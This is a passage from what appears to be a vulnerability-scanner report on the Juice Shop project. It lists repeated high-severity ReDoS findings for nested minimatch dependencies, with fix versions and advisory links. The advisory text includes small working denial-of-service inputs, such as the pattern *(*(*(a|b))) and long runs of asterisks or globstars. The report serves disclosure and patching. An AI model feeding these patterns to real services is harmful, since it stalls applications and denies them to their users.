10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 156: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/fstream/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 157: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 158: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 159: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/rimraf/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 160: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 161: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 162: CVE-2026-26996 Minimatch 5.1.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch5.1.6
+ + + + + + + +
File Path
juice-shop/node_modules/filehound/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 163: CVE-2026-27903 Minimatch 5.1.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch5.1.6
+ + + + + + + +
File Path
juice-shop/node_modules/filehound/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 164: CVE-2026-27904 Minimatch 5.1.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch5.1.6
+ + + + + + + +
File Path
juice-shop/node_modules/filehound/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
